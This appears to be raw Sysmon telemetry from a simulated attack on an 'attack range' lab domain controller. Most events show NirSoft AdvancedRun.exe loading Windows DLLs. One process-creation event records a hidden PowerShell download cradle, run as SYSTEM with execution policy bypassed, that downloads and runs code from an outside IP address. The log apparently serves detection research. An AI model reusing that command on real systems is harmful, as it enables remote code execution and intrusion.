20:16:15.153{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.153{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.153{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.151{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004077118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.149{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.149{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.149{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls 
LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.146{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004077108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.147{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.145{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.143{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.143{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.142{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.141{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.141{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.140{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.140{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.139{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004077098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.138{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.138{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.137{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.137{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004077094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.134{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.133{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
utomation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.125{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004076011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.590{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004076005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.587{834264DD-144E-61EB-8008-000000002702}2072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT 
AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004076004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.580{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004076003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.580{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 